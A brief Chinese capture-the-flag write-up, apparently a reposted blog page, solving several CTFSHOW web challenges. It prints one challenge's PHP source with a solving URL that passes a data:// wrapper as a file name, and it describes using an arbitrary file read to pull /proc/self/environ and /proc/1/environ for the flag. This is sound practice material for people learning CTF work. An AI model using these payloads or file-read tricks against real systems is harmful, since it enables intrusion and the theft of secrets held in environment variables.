本文主要是介绍[CTF]CTFSHOW摆烂杯 WEB WP,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
一行代码
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2021-11-18 21:25:22
# @Last Modified by: h1xa
# @Last Modified time: 2021-11-18 22:14:12
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/
echo !(!(include "flag.php")||(!error_reporting(0))||stripos($_GET['filename'],'.')||($_GET['id']!=0)||(strlen($_GET['content'])<=7)||(!eregi("ctfsho".substr($_GET['content'],0,1),"ctfshow"))||substr($_GET['content'],0,1)=='w'||(file_get_contents($_GET['filename'],'r') !== "welcome2ctfshow"))?$flag:str_repeat(highlight_file(__FILE__), 0);
很多个条件都要满足,拆分来仔细看就行,并不难
http://e7df25cc-b994-4b15-b08e-a901738bfa9c.challenge.ctf.show/?filename=data://text/plain,welcome2ctfshow&id=0&content=Wasdasdasdasdad
黑客网站
后缀onion,多百度一下就知道了
web签到
1
1
1)+110+(1
登陆不了
验证码处存在任意文件读取,直接读/proc/self/environ就能看到flag
登陆不了_revenge
预期方法群里有发,非预期是赛后羽师傅说的,读/proc/1/environ就能读到…
这篇关于[CTF]CTFSHOW摆烂杯 WEB WP的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
![BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin](https://i-blog.csdnimg.cn/direct/ed45c0efd0ac40c68b2c1bc7b6d90ebc.png)
